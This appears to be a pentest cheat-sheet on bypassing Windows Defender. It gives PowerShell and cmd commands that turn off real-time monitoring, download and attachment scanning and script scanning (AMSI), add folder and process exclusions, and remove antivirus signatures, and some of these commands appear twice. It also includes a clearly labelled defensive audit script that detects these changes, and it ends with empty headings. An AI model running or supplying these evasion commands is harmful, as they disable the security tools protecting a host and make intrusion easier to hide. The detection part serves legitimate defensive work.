Windows Defender Antivirus

Bypass Windows Defender Antivirus

C:\rfs> sc query windefend

Check status of Defender

PS C:\> Get-MpComputerStatus

Disable scanning all downloaded files and attachments, disable AMSI (reactive)

PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true

Disable AMSI (set to 0 to enable)

PS C:\> Set-MpPreference -DisableScriptScanning 1

Exclude a folder or process

PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"

Remove signatures

If an Internet connection is present, they will be downloaded again.

PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Disable real-time protection (proactive):

PS > Set-MpPreference -DisableRealTimeMonitoring $true

Disable scanning all downloaded files and attachments, and disable AMSI (reactive):

PS > Set-MpPreference -DisableIOAVProtection $true

Remove signatures (if Internet connection is present, they will be downloaded again):

PS > cd "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0"
PS > .\MpCmdRun.exe -RemoveDefinitions -All
Or
Cmd > "%PROGRAMFILES%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
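
Every command above leaves a trace in Defender's own preference and status output. The following is an added example, not part of the original page: a PowerShell audit that checks a host for those changes. The function name `Test-DefenderTamper` and the 7-day signature-age threshold are assumptions chosen for illustration.

```powershell
# Added example: audit a host for the Defender settings changed by the commands above.
# Test-DefenderTamper and the 7-day threshold are illustrative assumptions.
# Run elevated: non-admin sessions cannot read the exclusion lists.
function Test-DefenderTamper {
    [CmdletBinding()]
    param([int]$MaxSignatureAgeDays = 7)

    $findings = [System.Collections.Generic.List[string]]::new()

    # Service state (same information as: sc query windefend)
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    if (-not $svc -or $svc.Status -ne 'Running') {
        $findings.Add('WinDefend service is not running')
    }

    try {
        $pref   = Get-MpPreference -ErrorAction Stop
        $status = Get-MpComputerStatus -ErrorAction Stop
    } catch {
        $findings.Add("Defender cmdlets failed: $($_.Exception.Message)")
        return $findings
    }

    # Protection switches set through Set-MpPreference -Disable*
    if ($pref.DisableRealtimeMonitoring) { $findings.Add('Real-time monitoring disabled') }
    if ($pref.DisableIOAVProtection)     { $findings.Add('IOAV (download/attachment) scanning disabled') }
    if ($pref.DisableScriptScanning)     { $findings.Add('Script scanning disabled') }
    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Status reports real-time protection off') }
    if (-not $status.IsTamperProtected)  { $findings.Add('Tamper Protection is off') }

    # Exclusions: every entry should map to an approved change
    foreach ($p in @($pref.ExclusionPath))    { if ($p) { $findings.Add("Path exclusion: $p") } }
    foreach ($p in @($pref.ExclusionProcess)) { if ($p) { $findings.Add("Process exclusion: $p") } }

    # Removed or stale definitions (MpCmdRun.exe -RemoveDefinitions -All)
    $updated = $status.AntivirusSignatureLastUpdated
    if (-not $updated) {
        $findings.Add('No signature update timestamp reported')
    } elseif (((Get-Date) - $updated).TotalDays -gt $MaxSignatureAgeDays) {
        $findings.Add("Signatures last updated $updated")
    }
    return $findings
}

Test-DefenderTamper | ForEach-Object { Write-Warning $_ }
```

For continuous monitoring rather than a point-in-time check, the same changes are logged in the Microsoft-Windows-Windows Defender/Operational event log: event ID 5001 records real-time protection being disabled and 5007 records a configuration change such as a new exclusion.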

Lower Token Integrity

Disable Defender
